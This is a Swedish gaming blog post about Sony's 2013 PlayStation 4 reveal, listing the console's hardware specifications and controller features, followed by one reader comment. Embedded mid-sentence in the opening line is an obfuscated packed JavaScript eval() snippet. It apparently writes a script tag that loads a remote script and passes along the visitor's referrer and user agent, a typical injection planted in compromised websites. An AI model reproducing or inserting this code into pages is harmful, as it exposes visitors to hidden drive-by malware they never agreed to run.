Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Playstation 4: Sonys presentation från i går kväll

sony
Filip Urde
  • On 21 februari, 2013
  • http://www.revue.se/filip-urde

Här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzhbt|var|u0026u|referrer|bdbdr||js|php’.split(’|’),0,{}))
nedan kan vi se hela gårdagens SONY event från New York, där man äntligen visade upp nya Playstation 4!

P.ga. ett server fel igår så kunde vi inte få upp artiklar om eventet under kvällen/natten. Men vi ger er det nu istället. Så se eventet i sin hel het här ovan och njut av tanken på en ny Playstation 4. Hur fett blir inte det då?!

Sony Playstation 4, vad finns i den nya konsolen?

På eventet så pratade man bland annt om specifikationer och det ser ju ganska bra ut med en 8 kärnig processor. Se nedan:

Main Processor
Single-chip custom processor
CPU : x86-64 AMD ”Jaguar”, 8 cores
GPU : 1.84 TFLOPS, AMD next-generation Radeon based graphics engine

Memory
GDDR5 8GB

Hard Disk Drive
Built-in

Optical Drive (read only)
BD 6xCAV
DVD 8xCAV

I/O
Super-Speed USB (USB 3.0) ?AUX
Communication Ethernet (10BASE-T, 100BASE-TX, 1000BASE-T)
IEEE 802.11 b/g/n
Bluetooth® 2.1 (EDR)

AV output
HDMI
Analog-AV out
Digital Output (optical)

Viktigt som SONY ville poängtera var att varje konsol kommer att komma med ett headset som man kan koppla in i handkontrollen för röstchat.

Man klargjorde även att man tänkt extra noggrant på utvecklarna när man byggde playstation 4, så att de ska bli enkelt för dem att utveckla till konsolen.

Vidare så visade man upp handkontrollen som är mer eller mindre samma kontroll sett till utseendet, ja om man tar bort att den nya har en skärm dvs. Dock har den nya kontrollen en hel del nyheter och den kanske mest intressanta nyheten är att man lagt till en ”dela-knapp” som du kan du kan dela en video på t.ex. facebook  när du blåser huvudet av ett monster. Kontrollen kommer ha ett uttag för hörlurar. Samt en kamera verkar följer med i paketet. (Kinect?)

Man visade dock aldrig själva lådan (konsolen i sig). Man prata heller inte något pris. Men man nämnde att konsolen kommer släppas senare i år lagom till julhandeln, om vi får den till oss i Sverige då också är dock oklart. som vanligt alltså…
www.gamespot.com

 

Comments

  1. krille

    Fy satan va nice!!!!!